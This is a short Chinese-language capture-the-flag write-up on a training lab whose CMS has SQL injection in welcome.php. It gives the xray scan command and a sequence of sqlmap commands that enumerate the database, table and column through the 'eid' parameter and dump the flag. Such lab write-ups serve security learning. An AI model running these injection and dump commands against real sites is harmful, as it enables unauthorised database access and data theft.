本文最后更新于483 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
一、使用xray进行漏洞扫描
xray.exe ws --basic http://eci-2ze05o4pw3vdg8y30v3a.cloudeci1.ichunqiu.com/
welcome.php?q=1 --ho 3.html
二、查看漏洞日志,发现SQL注入漏洞,漏洞参数是eid
三、使用Sqlmap
1.探测数据库
sqlmap -u 'http://eci-2ze05o4pw3vdg8y30v3a.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p eid --dbs --batch
- -p 指定参数
--batch(默认确认)不再询问是否确认。--dbs获取数据库
成功获取数据库:ctf
2. 探测表名
sqlmap -u 'http://eci-2ze05o4pw3vdg8y30v3a.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p eid -D ctf --tables --batch
- -D 指定数据库
- –tables 获取表名
成功获取表名:flag
3.探测列名
sqlmap -u 'http://eci-2ze05o4pw3vdg8y30v3a.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p eid -D ctf -T flag --columns --batch
- -T 指定表名
- –columns 获取字段
成功获取列名:flag
4.查看数值
sqlmap -u 'http://eci-2ze05o4pw3vdg8y30v3a.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p eid -D ctf -T flag -C flag --dump --batch
- -C 指定列名
- –dump 获取数据
成功获取flag
四、尝试参数n是否有注入点
五、总结
- 使用漏洞扫描工具
- 使用Sqlmap工具